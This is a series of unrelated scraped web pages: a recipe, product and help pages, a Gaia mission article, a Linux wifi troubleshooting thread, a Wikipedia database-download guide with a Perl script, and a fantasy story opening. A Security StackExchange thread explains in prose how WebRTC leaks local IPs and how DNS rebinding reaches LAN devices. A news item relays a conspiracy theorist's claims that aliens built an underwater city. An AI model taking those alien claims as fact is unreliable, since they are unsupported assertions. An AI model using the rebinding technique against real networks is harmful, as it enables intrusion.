Collard Tuna Wraps Collard Tuna Wraps Serving Size: 2 Prep Time: 15 minutes Prepared by: @thecastawaykitchen • 2 cans of Safe Catch tuna (Don’t drain, no oil or water added) • 1 head of collard greens • 1 cup diced sweet onion • 1/4 cup minced parsley • 1/4 cup sliced almonds • 2-3 tbsp @primalkitchenfoods mayo • 1 tbsp @annieshomegrown mustard • 1 tbsp avocado oil • Juice of one lime • A dash of salt, a dash of black pepper 1. Empty two cans of Safe Catch tuna into a large bowl and mix so tuna can reabsorb its natural oils. 2. Add the following to the bowl: diced sweet onion,minced parsley, sliced almonds, mayo, mustard, avocado oil, lime juice, salt, and black pepper 3. Mix all ingredients together 4. Lay out individual collard green leaves 5. Scoop a reasonable amount of tuna salad into each leaf 6. Roll ’em up and serve! Our Mission Contact Safe Catch 888.568.4211 (toll-free) 85 Liberty Ship Way, Suite 203 Sausalito, CA 94965 USA
global_01_local_0_shard_00002368_processed.jsonl/41556
Oasis #2 by Mitzi Linn Mitzi Linn $ 475.00 This product is currently sold out Oasis #2 by Mitzi Linn Shown here is "Oasis #2" by Mitzi Linn. Artist Note: This Oasis in a desert canyon, with a red sunset. The huge boulders are the ancestors, the rocks. They represent the groundedness of human experience. Size: 10" x 20" Gouache paint (water base, not acrylic) on archival paper. Please Note Artwork is not framed or matted Share this Similar Products
global_01_local_0_shard_00002368_processed.jsonl/41563
Asset Publisher Towards the final Gaia catalogue Towards the final Gaia catalogue In the early 2020s, the final Gaia catalogue will be published. This will be the definitive stellar catalogue for the foreseeable future, playing a central role in many and varied fields of astronomy. Producing this final catalogue is a complicated endeavour that requires the entire mission dataset and a complex processing chain devised and tested by hundreds of scientists and software experts in the Gaia Data Processing and Analysis Consortium (DPAC). Even before the first data release special subsets of Gaia data were made public to facilitate timely follow-up observations by the wider astronomical community. For example, Science Alerts – announcements to the scientific community about detected transient events such as supernovae and outbursting stars – were, and continue to be, regularly issued. The Gaia coordinates for one particular star were made available, in advance of the data release, to astronomers studying a rare occurrence of Pluto passing in front of this star. Following the first data release in September 2016, the release of new datasets, based on longer time intervals and with additional data products, are planned to take place with a cadence of about one per year. These will be characterised by increasingly improving precision and additional parameters for the surveyed stars, as well as for other celestial objects – from Solar System bodies to galaxies beyond our Milky Way. Eventually, the final catalogue will contain full astrometric (position, distance and motion) and photometric (brightness and colour) parameters for over one billion stars as well as extensive additional information including a classification of the sources and lists of variable stars, multiple stellar systems and exoplanet-hosting stars. For more than 150 million stars there will be measurements of the radial-velocity – the speed at which the star is travelling towards or away from us. The final Gaia catalogue will be a census of our Galaxy of such superb precision and detail that it will redefine the fundamental reference frame used for all astronomical coordinate systems. This will truly mark a new era of astrometry. Last Update: 1 September 2019 23-Jan-2020 07:28 UT ShortUrl Portlet Shortcut URL Images And Videos Related Publications See Also
global_01_local_0_shard_00002368_processed.jsonl/41565
"Physical Fitness across 11- to 17-Year-Old Adolescents: A Cross-Sectional Study in 2267 Austrian Middle- and High-School Students" written by Klaus Greier, Clemens Drenowatz, Gerhard Ruedl, Werner Kirschner, Peter Mitmannsgruber, Carla Greier, published by Advances in Physical Education, Vol.9 No.4, 2019 has been cited by the following article(s): • Google Scholar • CrossRef No relevant information.
global_01_local_0_shard_00002368_processed.jsonl/41567
Corporate Sponsorship Note: As of June 19, 2018 went live and became a digital asset under the management of Southern California Public Radio. 89.3 KPCC reaches more than 900,000* affluent and educated listeners throughout Southern California each week. and reach over 2-million monthly unique digital influencers.  Corporate sponsorship of KPCC and is a good business investment; we know that our audience is 88 percent more likely to buy products and services from companies that support our public service journalism mission. For more information on becoming a KPCC Corporate Sponsor, please call our Corporate Sponsorship Department at (626) 583-5235, or email us directly. You'll be in good company when you support KPCC. » Our audience » Your message » Online underwriting » Guidelines
global_01_local_0_shard_00002368_processed.jsonl/41581
I have two computers, both of them locate at the same local WIFI network ( ie: connected to the same router). I use VPN on a computer to visit a website, and don't use VPN on another to visit the same website. Can this website know that both computer are located within the same local WIFI network? • Which browser are you using? – Konrad Gajewski Jul 9 '15 at 10:52 • @KonradGajewski, standard browser like Firefox or Google Chrome – Graviton Jul 9 '15 at 11:31 • The reason why I am asking is because potentially ActiveX is able to access your disk/other system resources on your computer. And this could potentially get you your ESSID. – Konrad Gajewski Jul 9 '15 at 11:43 • As mentioned webrtc can expose your local IP, a good resource for detecting webrtc leaks is whoer.net – HamblePie Aug 23 '18 at 7:29 In theory, yes, the webrtc standard let's a website determine your local ip address, so it can create a direct connection for you to a another web-browser, allowing direct connections between browsers to set up video streaming for example. This website has a proof of concept showing you your internal and external ip address: https://www.privacytools.io/webrtc.html Once the website has both internal ip addresses, it can use javascript to try to set up a connection over the internal ip's from pc1 to pc2, if this succeeds, it knows these 2 pc's are in the same local network. remark: Chrome on iOS, Internet Explorer and Safari do not implement WebRTC yet, see https://www.privacytools.io/#webrtc for more info. Update 23/08/2018: Another possible attack vector has come to my attention lately: DNS rebinding, from wikipedia: In this attack, a malicious web page causes visitors to run a client-side script that attacks machines elsewhere on the network. In theory, the same-origin policy prevents this from happening: client-side scripts are only allowed to access content on the same host that served the script. Comparing domain names is an essential part of enforcing this policy, so DNS rebinding circumvents this protection by abusing the Domain Name System (DNS). This attack can be used to breach a private network by causing the victim's web browser to access machines at private IP addresses and return the results to the attacker. It can also be employed to use the victim machine for spamming, distributed denial-of-service attacks or other malicious activities. This works by having a malicious website/dns server setting a very low ttl for it's dns requests, and then having javascript running scripts on the original website's address. Half of the time the dns will respond with the correct external ip, so the website will load, but after a few minutes when the javascript kicks in and tries to access the website again the dns will respond with a local ip adres (e.g., this can change every few minutes) and the browser will run the javascript and connect to devices on the local network! • Thanks for posting this! Tried this with Firefox and shows nothing (now 2018). Using Chrome however, shows the local IP address! Then it is easily to detect or find the routers it address by sniffing all kind of addresses inside this range with javascript. I don't know if it is possible (i think it is, with some tricks) it can be a real danger. – Codebeat Feb 7 '18 at 4:51 If your system is setup properly (your VPN isn't leaking, you never contacted the web site except through your VPN, you're not allowing the web site to run anything on your machine with anything but default priority and the web site isn't exploiting something in your setup to run code by itself), then no: the web site can not find out that both of your machines are on the same local network. That isn't to say it cannot find out that they are related indirectly: the obvious way is if you login with the same credentials but they are other, more subtle ones (cookies and related objects, usage pattern analysis, etc.) O.K. After some research I found out that it could be possible using some malicious ActiveX control. For one, such a control is able to read files on your local disk. This could be used to determine the connection type, and possibly connection details, including ESSID, and potentially the SSID. I'm nowhere near producing a PoC code though. This of course applies only to browsers supporting ActiveX. Other methods could involve Java, and generally injecting some malicious code to get control of your machine, but the latter is well beyond the scope of this question. • 1 If I remember correctly, ActiveX is not presented on Google Chrome or Firefox right? – Graviton Jul 10 '15 at 3:48 • Not by default. There are plug-ins though. – Konrad Gajewski Jul 10 '15 at 9:05 In general, a browser cannot detect your local IP or any information about your LAN. Thus any javascript code running in your browser cannot communicate to the web site any information about your computer or your LAN. HOWEVER... most browser plug-ins and Flash or Active-X controls can access data that is normally restricted by the browser. For that reason, it is important to treat browser plug-ins and extensions VERY carefully. If possible, never use these, and if you have to, keep the plug-in settings to 'ask' (where the browser asks you before running a plug-in on any site). • a browser can detect your local Ip ( like any program running on your computer) but shouldn't disclose it without your permission except that in fact WebRTC does. – grandchamp robin Aug 19 '15 at 14:17 • yes of course a browser can detect everything on your computer and do all kinds of bad stuff. What I meant was that browsers create a sandbox for your web applications that cannot access local IP or filesystem etc. Caveat - plug-ins and extensions can be used by web applications to bypass the sandbox restrictions. Also see WebRTC vulnerability pointed out by @jens timmerman ... not sure if the leak was an oversight in the WebRTC design or by design. – Ruchir Godura Aug 20 '15 at 15:03 No. The website only knows the public IP address from where you are connecting. Obviously the public IP address is different when you go through your local router than going through a VPN. If you use a VPN, the public IP address is the address of the router used to go outside in the site where the VPN tunnel ends. It could be even in another country. It's the trick that some people use to circumvent region restriction on YouTube, Netflix, Hulu,etc. • 1 There are a few web browser technologies that could possibly do it, and a few cracking methods to do it as well. It is not that simple, so please don't give a false sense of security. – Konrad Gajewski Jul 9 '15 at 10:54 • Can you explain it in a complete answer so everybody (including me) learn about it? – jcbermu Jul 9 '15 at 10:57 • Well I'm working on it. Quite interesting question. – Konrad Gajewski Jul 9 '15 at 11:00 Your Answer
global_01_local_0_shard_00002368_processed.jsonl/41607
XML Sitemap URLPriorityChange frequencyLast modified (GMT) https://shelter-press.org/matt-carlsonthe-view-nowhere-sp072/20%Monthly2017-06-20 09:06
global_01_local_0_shard_00002368_processed.jsonl/41658
Eyelid Surgery Eyelid surgery, also known as blepharoplasty, is a surgical procedure that removes excess skin and wrinkles from the lower eyelids, and fatty deposits that cause puffiness from the upper eyelids. It eliminates bags and dark circles under the eyes, and corrects droopiness of the lower eyelids. The best candidates for eyelid surgery are individuals in good health who have realistic expectations about the outcome. They are usually at least 35 years old and nonsmokers. Eyelid Surgery Procedure A typical eyelid surgery, one that works on both the upper and lower eyelids, takes about two hours. Patients receive a local anesthetic and either oral or intravenous sedation. Upper eyelid surgery is usually performed first; incisions are made along the natural folds of the eyelids and the skin is separated so that excess fat, tissue and muscle can be removed. For the lower eyelids, an incision is usually made just below the lashes and excess fatty deposits are removed. In some cases, laser resurfacing may be recommended. Eyelid Surgery Risks While eyelid surgery is a common procedure that thousands of people undergo every year without problems, there is always some risk involved with surgery. Possible complications include infection, hematoma, scarring, allergic reactions, an inability to completely close the eyes, loss of vision and dryness or irritation in the eyes. Patients usually experience some swelling or bruising and may experience blurry vision and a sensitivity to light. Results are usually long lasting, although continued aging can make forehead skin sag, resulting in the appearance of droopy eyelids again over time. Some patients choose additional surgery on the upper eyelids after a number of years. Repeat surgery on the lower eyelids is rarely necessary.
global_01_local_0_shard_00002368_processed.jsonl/41674
12:15 GMT +323 January 2020 Listen Live Get short URL Having examined his discovery, the conspiracy theorist suggested that the symbol he found might point at the location of a city built there by aliens in times immemorial. Prominent conspiracy theorist Scott C. Waring, who previously spotted an alleged underwater alien base and a suspected underground facility near Area 51 while scrutinizing digital maps, has recently announced yet another staggering discovery as he apparently detected some kind of structures underneath the sea off the coast of Japan. Chronicling his exploits in his blog, ET Data Base, Waring pointed at what looks like some strange symbol emerging from the ocean floor, "about 1-2 meters deep and close to 6 meters across" and "millions of years old". "It’s possible that millions of years ago, and an alien culture came down in this location to create a city. It’s also possible that this city was Atlantis itself", he pondered. "It’s obvious from the evidence worldwide that aliens did inhabit the Earth’s surface millions of years ago, but this may be one of the few locations were alien writing has been found". Earlier this year, a Biblical researcher and writer named Ryan Peterson, also claimed that the ruins of the mythical city of Atlantis may actually be found in Israel. Quest for Atlantis: Sunken Island Found Near Gibraltar Via New Mapping Software Muslim 'Atlantis'? Europe’s Oldest Remaining Mosque May Lie Buried Outside This City discovery, aliens, ruins, sea, Japan Community standardsDiscussion Comment via FacebookComment via Sputnik
global_01_local_0_shard_00002368_processed.jsonl/41691
Tag: Sonu Nigam We’re even giving God a headache ! Columns, In Black & White We’re even giving God a headache ! April 22, 2017 Sonu Nigam wrote that azan, the call to prayer for Muslims early in the morning, was disturbing him. And lo and behold, all kinds of noise pollution erupted; from self-proclaimed God’s special children, the priests, to opportunistic publicity-seekers. While Sonu Nigam may not have lost his voice, he sure lost his cool and with that… To advertise on Star of Mysore, email us at Online Edition: [email protected] Print Editon: [email protected] For News/Press Release: [email protected]
global_01_local_0_shard_00002368_processed.jsonl/41716
Scintillating Saturday Share#1 1 Andrew Pons|Unsplash Photo credit: Andrew Pons | Unsplash trE over at A Cornered Gurl invites all of us to join her in sending a little “love, light, peace, and kindness out into the ether.” In no more than 7 words, what does this picture spark in you? Go ahead, take a look! via Scintillating Saturday Share#1 The Eclectic Blogger Award The Eclectic Blogger Award The Eclectic Blogger Award The Rules My Nominations Links I Hope You’ll Click #Memorial Day 2017 Screen Shot 2017-05-29 at 14.16.07 Normally, we think about all those who fought for American ideals and dreams on Memorial Day. I can’t help but feel it more personally, too. My dad was part of The Greatest Generation, the oldest generation with any living members who fought in a World War.  He was 19 and a chemical engineering major at UW Madison in 1944, when he enlisted in the US Army. He spent his 6 weeks in boot camp, and was immediately sent to France. Two months later, he and a German soldier faced each other in a trench. The German’s bullet hit the pen in PFC Ranscht’s left breast pocket, and glanced off into his left arm, shattering the humerus. When he returned to the USA, he left his left arm in France. Continue reading “#Memorial Day 2017” A Little Closer to Home Let me bring you back from the Center of the Universe to our own Solar System. Allow me to introduce the haunting Sound of Jupiter. Artist’s concept of Jupiter’s magnetosphere conducting the Solar Wind Symphony around Jupiter. (Image credit: JAXA, the Japan Aerospace Exploration Agency)
global_01_local_0_shard_00002368_processed.jsonl/41723
Construct an Essay Plan Construct an initial essay plan After you have generated some ideas, it’s important to write an initial plan before you head for the library. This can feel strange—after all, how can you answer a question when you haven’t done any research?—but starting with an initial plan helps you order your ideas and focus your reading. Without a sense of which direction to head in, it’s easy to get lost in the research process. This initial plan will be provisional and might consist of: • a provisional answer to the question (or thesis statement) • a brief outline of possible main point. As you research and develop your understanding of the topic, your ideas will likely change, and your answers may change with them. Try to see your essay plan as something that evolves as you engage further with your topic. While it’s a good idea to write an initial plan before you start researching, if you really know nothing at all about the topic, some initial skimming and browsing through recommended or assigned readings can provide a few ideas. However, the initial planning stage is not the time for a lot of intensive or detailed reading. What elements should an essay plan consist of? A plan should indicate the answer to the question. A clear and well-written thesis statement will help you to determine the direction and structure of your argument. What is a thesis statement? • A clear and direct answer to the essay questio. • A claim that can be discussed and expanded further in the body of the essay. • One or two complete sentences. • A part of the introduction. In the initial plan, the thesis statement is usually provisional. However, after you’ve done some research, you will need to work on your thesis statement until it is clear, concise and effective. • Try introducing your thesis statement with the phrase ‘this essay will argue’ or ‘this essay argues’. • Paraphrasing the assignment question can help ensure that you are answering it. Possible main points Once you have a thesis statement, follow it with a paragraph or a set of points that indicate the ‘reasons why’ for your answer. The ‘reasons why’ can be developed into the main points of your essay. What are main points? • Main points make up the body of an essay. • Each point should be developed in a paragraph. These paragraphs are the building blocks used to construct the argument. • In a 1000-1500 word essay, aim for three to four main points In the initial plan, try to express the main idea of each point in a single, clear sentence. These can become topic sentences—usually the first sentence of each paragraph which summarise the information in the paragraph. In your second plan, you develop these points further.  Arrange your main points in a logical order and number them. Is there one that would seem to go first or one that would seem to go last? Are there any two that are closely linked? How are the ideas connected to each other? Do the main points, when considered as a whole, present a unified discussion?). The structure of the essay A plan should follow the structureof an essay, e.g. Introduction, body and conclusion. While you may not be ready to construct an introduction or conclusion, this three-part structure should be at least suggested in your plan.   For more about essay structure, see The Learning Centre's essay writing guide Some indication of the research A plan should include some indication of the sources you might use to RESEARCH the topic. Make a few notes about how each main point might be developed. If possible, specify the evidence you might draw on and which texts you might refer to. Jot down titles, authors, page numbers etc.
global_01_local_0_shard_00002368_processed.jsonl/41740
Connected to my wireless router at home won't give me internet access. What happened Several days ago I was connected to the Wifi router at home and everything works like a charm. Then I closed my Thinkpad and it was send to hibernate mode. Later at the university I was also able to connect to their WPA2-Enterprise (radius-managed) Wifi. Back at home, I wake up my laptop, fired up the Wifi connection, got an IP, but then nothing works. I have no internet connectivity. All ping requests to public IPs and Domain Servers timed out. The Wifi router was also not reachable via ping (which may be an security feature). Things done so far • Reconnected serveral times to the router • Deleted the credentials of the networkmanager and entered it again • Restarted the networkmanager using sudo service network-manager restart • Installed wicd and disabled networkmanager at boot by renaming it's startup files • Inspected rfkill to see, if there is something blocking the wireless interface • Booted a linux live CD to see, if theres any issue to the configuration files Booting my windows partition and connecting to the wifi router give me internet access as usual. Linux Mint 17 wlan0: Intel wifi interface What else can I do? • 3 Not a programming question. This question belongs in superuser – toddlermenot Nov 25 '14 at 17:32 Looking at your description, it's not very likely that any of these help, but maybe it's still worth trying. What could be wrong? • Driver corrupt. • Connection settings corrupt. • DHCP corrupt. • DNS corrupt. • Wrong MTU settings (in your case unlikely, just in general). How to check what's wrong • Check for error or warning messages regarding wlan0 and DHCP in /var/log files like /var/log/messages, /var/log/dmesg and /var/log/syslog. • Check your IP configuration using /sbin/ifconfig. The inet address of wlan0 should be present, not be link-local (169.254.*.*), and have a reasonable Mask, usually If you dial-in on DSL or ISDN, your MTU should probably be 1492, not 1500. Example: wlan0 Link encap:Ethernet HWaddr 00:01:2e:3a:58:9f inet addr: Bcast: Mask: inet6 addr: fe80::201:2eff:fe3a:589f/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:106687 errors:0 dropped:0 overruns:0 frame:0 TX packets:79673 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:107622853 (107.6 MB) TX bytes:10363345 (10.3 MB) • Check routing setup using /sbin/route -n. Example: Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface UG 0 0 0 wlan0 U 1 0 0 wlan0 • If ping (one of the DNS root servers) succeeds but ping ietf.org fails, your DNS setup is bogus. • netconfig update -f fixed my DNS problems. Thanks for pointing me in the right direction! – Klinghust Feb 11 '17 at 23:10 Your Answer
global_01_local_0_shard_00002368_processed.jsonl/41742
Stay Up To Date The feedback we get from our beta testers is most meaningful if families are all using the latest and greatest build.  Updating Brili to the Latest Being in beta means we have to use TestFlight, and that's not as seamless as the app store. For one thing, Brili doesn't automatically upgrade itself like your other apps do. Usually when we release a new version (roughly once a week), you'll get an email from TestFlight that looks like this: The easiest way to update is to tap on the "View Update" button in the email when you're on your mobile device and this will launch the TestFlight app and begin installing the latest version. If you miss the email, or just aren't sure if you're running the latest Brili, simply launch your TestFlight app as you see in above image. Once in TestFlight, look at the button next to Brili: • If it says "Open", you're already up to date. • If it says "Update", there's a new and improved build of Brili waiting for you to try. Please tap the button! • If it says "Install", Brili isn't on the current device at all so definitely tap the button in this case, too. Updating via TestFlight usually takes only 30 seconds, and needs to be done on all devices running Brili.
global_01_local_0_shard_00002368_processed.jsonl/41743
DX8 breakpoint indicator The module "DX8 breakpoint indicator" is included within DX8 as a sub module from version 5.4.0, once the module is enabled an icon will appear in the bottom left of your browser screen showing which breakpoint you're viewing the page at. Enabling the module 1. Click Extend in the admin menu 2. Search for DX8 breakpoint indicator  3. Click the checkbox next to the module and click Install. Alternatively you can install using the following drush command: drush en cohesion_breakpoint_indicator Displaying the breakpoint indicator  Displaying the breakpoint indicator is managed through user permissions, to allow for certain user roles to view the indicator and will only appear on the front-end of your website and not on admin pages. Cohesion DX8 Help center DX8 knowledge base icon Knowledge base Find answers Raise a ticket icon Raise a support ticket Raise ticket
global_01_local_0_shard_00002368_processed.jsonl/41746
Teams is a feature that allows you to maintain a large organizational structure. Each Team consists of different Admins, Supervisors, and Agents. Some use cases for Teams include: • Teams that are split up geographically, with each office location being one Team. User management can be controlled by the local Supervisor. • Teams that are organized by function (Trust and Safety, Operations, Support) can have performance tracked via Analytics. • Teams which consist of outsourced Agents who may have different SLAs, skills, and permission sets. Teams is designed for very large support organizations who have specialized groups. Please reach out to your Account Manager or to to learn more about how you can use Teams to structure your support organization. Please note that there must be at least one Supervisor designated for each Team, and that no one person can be a member of two Teams. To learn more about the Agent, Supervisor, and Admin roles at Helpshift, please see What are the different roles in Helpshift? Once you have Teams enabled, your Admins and Supervisors can use Real-Time Operations to monitor your Team and Queue performance live during shifts. To learn more, see What is Real-Time Operations, & how do I use it? If you do not have Teams enabled on your Dashboard, you’ll only see one Team listed in the ‘Teams’ area, which includes everyone in your Dashboard as members.
global_01_local_0_shard_00002368_processed.jsonl/41748
Create your study name and study address (URL) Your study name is for your reference, and will not be shown to participants. It's the name you'll see on your list of studies. Your study address (URL) is the link you will send your participants. You can keep the default URL, or you can write a new, more distinctive URL: if your original URL looks like this: your customized URL would look like this: Select the language of your headings and buttons You can run studies in over 70 languages. The buttons and headings in your survey will appear in the language you select. You will still need to write your own questions, welcome messages, and thank you messages, as the default text is in English. Use 'Preview' to see exactly which parts of your study are in the language you select. Protect your study with a password If you enter a password into the text box, only participants with that password will be able to complete your study. If you leave it blank, then anyone with the link can complete your study. If you are only sending your study link to people you know, or if you don't mind who participates in your study, you probably don't need to use a password. You can't change your password setting after you launch your study. How to end your study — closing rule or manually You have four options for when your study finishes. If you select 'Manually, you can close your study at any time by clicking the red 'Finish now' button at the top of your study: You can also choose to: • set a date for your study to end • set a participant limit • set both a date and a participant limit. Participants who have started your study will be able to finish it, even if the date or participant limit is reached after they start. Your choice will depend on your study. If you only need a set number of participants, then setting a participant limit will mean you can get started analysing your data as soon as the limit is reached. Similarly, if you have a deadline, choosing an end date will mean you can schedule the beginning of your analysis. Did this answer your question?
global_01_local_0_shard_00002368_processed.jsonl/41760
கட்டற்ற கலைக்களஞ்சியமான விக்கிப்பீடியாவில் இருந்து. Jump to navigation Jump to search விக்கிபீடியாவின் அனைத்து உரைப்பகுதிகளும் குனூ தளையறு ஆவண உரிமம் எனும் காப்புரிமையின் அடிப்படையிலேயே வழங்கப்படுகின்றன. ; இதுபற்றிய மேலதிக தகவல்களுக்கு விக்கிபீடியா: காப்புரிமைகள் பக்கத்தைப் பார்வையிடவும். விக்கியினை தொழிற்படச்செய்வதற்கான மென்பொருளை பெற்றுக்கொள்ள விக்கிபீடியா: மீடியா விக்கி பக்கத்தினைப் பார்வையிடவும்.. Another page has just the database schema or layout. Why not just use a dynamic database download?[தொகு] Suppose you are building a piece of software that at certain points displays information that came from wikipedia. If you want your program to display the information in a different way than can be seen in the live version, you'll probably need the wikicode that is used to enter it, instead of the finished html. Also if you want to get all of the data, you'll probably want to transfer it in the most efficient way that's possible. The wikipedia.org servers need to do quite a bit of work to convert the wikicode into html. That's time consuming both for you and for the wikipedia.org servers, so simply spidering all pages is not the way to go. To access any article in xml, one at a time, link to (after logging): Read more about this at Special:Export. Weekly database dumps[தொகு] SQL database dumps on download.wikimedia.org have historically been updated approximately twice weekly. However, currently (as of சூன் 1 2005), the most recent database dump dates from 20050516. The status of the download server is discussed in Wikipedia talk:Database download. These can be read into a மைசீக்குவெல் தொடர்புசால் தரவுத்தளம் for leisurely analysis, testing of the Wikipedia software, and with appropriate preprocessing, perhaps offline reading. There is also a fuller archive of database dumps, containing tables other than cur and old. The database schema is explained in schema.doc. The cur tables contain the current revisions of all pages; the old tables contain the prior edit history. Approximate file sizes are given for the compressed dumps; uncompressed they'll be significantly larger. The files for the larger wikis are currently split into files of about 2GB called xaa, xab, etc. See here for information on sticking them back together. Windows users may not have a bzip2 decompressor on hand; a command-line Windows version of bzip2 (from here) is available for free under a BSD license. An LGPL'd GUI file archiver, 7-zip [1], that is also able to open bz2 compressed files is available for free. Mac OS X ships with the command-line bzip2 tool and StuffIt Expander, a graphical decompressor. Currently (as of 2004-09-20) a compressed database dump of all wikis is 26805MB (842MB for just current revisions). If you thought that's 26.2 கிகாபைட்டுs, you're absolutely correct. On a 56kb/sec standard dial-up modem connection, it will take you only 44.3 days to download! The english version alone (as of 2004-09-20) is about 11.7GB compressed and about 40GB uncompressed. Images and uploaded files[தொகு] Unlike the article text, many images are not released under GFDL or the public domain. These images are owned by external parties who may not have consented to their use in Wikipedia. Wikipedia uses such images under the doctrine of நியாயமான பயன்பாடு under United States law. Use of such images outside the context of Wikipedia or similar works may be illegal. Also, many images legally require a credit or other attached copyright information, and this copyright information is contained within the text dumps available from download.wikimedia.org. Some images may be restricted to non-commercial use, or may even be licensed exclusively to Wikipedia. Hence, download these images at your own risk. As of 2004-07-19 the image archive is unavailable for unknown reasons (the links points to non-existent files) But This link is working download.wikimedia.org/archives/en/ the name of the files for the image are 20040702_wikipedia_en_upload.tar.aa and 20040702_wikipedia_en_upload.tar.ab Before that, only the files uploaded to the English wikipedia were available to download. These might be re-instated, and others may follow later. The file archives, like the text archives, available at http://download.wikimedia.org/#images are split into 1.9 GB chunks. Static HTML tree dumps for mirroring or CD distribution[தொகு] Terodump is an alpha quality wikipedia to static html dumper, made from wikipedia code. Static html dump (beta quality) wikipedia-terodump-0.1.tar.bz. This dump is made of a database that is some months old. - User:Tero Wiki2static is an experimental program set up by User:Alfio to generate html dumps, inclusive of images, search function and alphabetical index. At the linked site experimental dumps and the script itself can be downloaded. As an example it was used to generate these copies of English WikiPedia 24 April 04 Simple WikiPedia 1 May 04(old database) format and English WikiPedia 24 July 04Simple WikiPedia 24 July 04 WikiPedia Francais 27 Juillet 2004 (new format). BozMo uses a version to generate periodic static copies at fixed reference. If you'd like to help set up an automatic dump-to-static function, please drop us a note on the developers' mailing list. see also Wikipedia:TomeRaider database Possible problems during local import[தொகு] See Wikipedia:Database dump import problems. Please do not use a web crawler[தொகு] Please do not use a வலை ஊர்தி to download large numbers of articles. Aggressive crawling of the server can cause a dramatic slow-down of Wikipedia. Our robots.txt restricts bots to one page per second and blocks many ill-behaved bots. Sample blocked crawler email[தொகு] IP address nnn.nnn.nnn.nnn was retrieving up to 50 pages per second from wikipedia.org addresses. Robots.txt has a rate limit of one per second set using the Crawl-delay setting. Please respect that setting. If you must exceed it a little, do so only during the least busy times shown in our site load graphs at http://wikimedia.org/stats/live/org.wikimedia.all.squid.requests-hits.html . It's worth noting that to crawl the whole site at one hit per second will take several weeks. The originating IP is now blocked or will be shortly. Please contact us if you want it unblocked. Please don't try to circumvent it - we'll just block your whole IP range. If you want information on how to get our content more efficiently, we offer a variety of methods, including weekly database dumps which you can load into MySQL and crawl locally at any rate you find convenient. Tools are also available which will do that for you as often as you like once you have the infrastructure in place. More details are available at http://en.wikipedia.org/wiki/Wikipedia:Database_download. Instead of an email reply you may prefer to visit #mediawiki at irc.freenode.net to discuss your options with our team. Importing sections of a dump[தொகு] The following பெர்ள் script is a parser for extracting the Help sections from the SQL dump: s/\n// if (($j++ % 2) == 0); foreach (split /\n/) { next unless (/^\(\d+,12,\'/); s/^\(\d+,\d+,/INSERT INTO cur \(cur_namespace,cur_title,cur_text,cur_comment,cur_user, cur_is_new,cur_random,cur_touched,inverse_timestamp\) VALUES \(12,/; NOTE: Using the current meta.special dump (as at 2005-05-16) the order of the fields in the cur table has changed. inverse_timestamp now comes BEFORE cur_touched. This may cause Windows users no end of grief because all of a sudden your MediaWiki starts sprouting PHP errors about dates that are negative or occur before 1 January 1970 being passed to gmdate and gmmktime functions in GlobalFunctions.php. The reason is that the fields are swapped around and so there is rubbish data in these two fields. Maybe the Unix versions of these functions are smarter or do not cause PHP to spit a Warning message into the HTML script output, or else people have php.ini configured to not display these. In other words, check that the field order in the script aligns with those in the dump. Better still, we should look at changing the script to retain whatever field order the dump uses 8-) You can run the script and get a resulting help.sql file with this command: bzip2 -dc <Date>_cur_table.sql.bz2 | perl -n <Script Name> > help.sql The script can be easily modified to acquire any section you need with a few minor changes. Currently, it is set to get all records from namespace 12, the Help namespace. You can change the two 12's to grab a different namespace, or slightly change a couple of சுருங்குறித்தொடர் to get, say, all articles that begin with Q: next unless (/^\(\d+,\d+,\'[qQ]/); s/^\(\d+,/INSERT INTO cur \(cur_namespace,cur_title,cur_text,cur_comment,cur_user, cur_is_new,cur_random,cur_touched,inverse_timestamp\) VALUES \(/; Or you can use more more generic version of this script from User:Msm/extract.pl. NOTE: While this sounds really straightforward as a way to grab the Help namespace (#12) for use on your newly implemented MediaWiki site, you need more than just that. You also need the Template namespace (# 10) since many of the Help: pages rely on templates in some form or another. Of course, you then end up with hundreds of templates that are NOT used by the Help: pages too. Has anyone got a better idea for a script to do this ? Armistej You can use rsync to download the database. For example, this command will download the current English database: rsync rsync://download.wikimedia.org/dumps/wikipedia/en/cur_table.sql.bz2 . --partial --progress The "--partial" switch prevents rsync from deleting the file in the event the download is interrupted. You may then issue the very same command again to resume the download. The "--progress" switch will show the download progress; for less verbose output, do not use this switch. The rsync utility is designed to synchronize files in a manner such that only the differences between the files are transferred. This provides a considerable performance enhancement, especially when synchronizing large files that have relatively few changes. However, if a file is compressed or encrypted, rsync will not perform well; in fact, it may perform worse than downloading a fresh copy of the file. Many of the database files are only available compressed. Therefore, there is little, if anything, to be gained by attempting to use rsync as a means of expediting an update of an older SQL dump. If the SQL dumps were available uncompressed, this process should work extremely well, especially if rsync is invoked with the on-the-fly compression switch (-z). It is uncertain as to whether uncompressed database dumps will become available. However, rsync does remain a useful and expedient tool for resuming downloads that have been interrupted, repairing downloads that have become corrupted, or updating any files that are not compressed (i.e. upload.tar). For more information, see rsync. Technical notes[தொகு] • There is some discussion about a modified gzip that can improve rsync performance. However, gzip does not achieve the same compression ratio as bzip2. It is uncertain whether such advancements exist or are possible for bzip2, or what the ramifications may be. • Technically speaking, upload.tar is compressed, in the sense that it mostly contains compressed files such as images (which is why it should not be compressed otherwise). However, usually the files themselves do not change. The addition, removal, or reordering of static files in an uncompressed tarball should still yield excellent rsync performance, regardless of the content of those files. See also[தொகு]
global_01_local_0_shard_00002368_processed.jsonl/41771
Speaking without words A night of laughter and fear Divine punishment “Many a lonely year passed as Hayaoh wandered the world with only his sword for company. His heart of stone was hard and cold and heavy within his chest for so long that he grew to used to its burden; its weight became as much a part of him as his breath, as his soul. Young and hopeful bucks often dared themselves to cross his path as tales of him spread, hoping to challenge and defeat the samurai of legend. These he slew, one and all, and the countless faces of those that he cut down ran together in his mind like spilled paint, becoming indistinguishable from one another…” [Excerpt from The Legend of Hayaoh, a collection of squirrel folklore, circa Year 500] “All right,” said Naole. The doe’s bush-like tail twitched back and forth, and her hazel eyes shone with anticipation. “One more time.” She pointed to herself. Less than a second went by before the hybrid’s large hands and long, spindly fingers began to move. <Na-o-re.> His gestures were delivered with impressive skill and accuracy… save for that last syllable, which was the closest equivalent. Rendering her name in Old Standard had always been a tricky prospect. “Good. And her?” Naole indicated their new companion, who sat tending the fire as she watched. The flames made contrasting patterns of shadow in her deep blue fur, and danced in the cloudy grey of her eyes. <A-ri-a!> he signed. “Good! What about you?” Beaming, he pointed at himself and signed: <Re-gi-o-n!> “Perfect!” Naole pounced and seized Legion in a hug, unable to restrain herself. She felt his fur 